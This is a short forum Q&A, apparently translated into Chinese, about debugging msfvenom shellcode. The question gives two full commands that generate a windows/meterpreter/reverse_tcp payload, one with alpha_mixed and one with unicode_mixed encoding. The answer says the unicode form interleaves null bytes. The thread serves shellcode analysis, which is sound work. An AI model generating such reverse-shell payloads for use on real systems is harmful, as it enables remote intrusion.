调试unicode msfvenom有效负载

Question

我想调试一些msfvenom生成的有效负载。当我以这种方式生成使用“标准”编码的有效负载时，我完全能够做到：

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX

在这种情况下，我可以获得结果负载，使用类似于Blobrunner的东西，我就可以开始了。

如果我使用unicode编码生成外壳代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX

这同样是不起作用的:当我处理外壳代码时，我得到了许多重复/无效的指令。这是有意义的，因为我想我把它当做普通的编码来管理。但是我如何调试这个外壳代码呢？有没有工具可以把它转换成一个“有效”的序列，去掉"unicode填充“？

非常感谢!

Answer 1

我想我明白了:这只是在字节之间添加一个00的交错...很简单...不知道为什么我之前错过了它...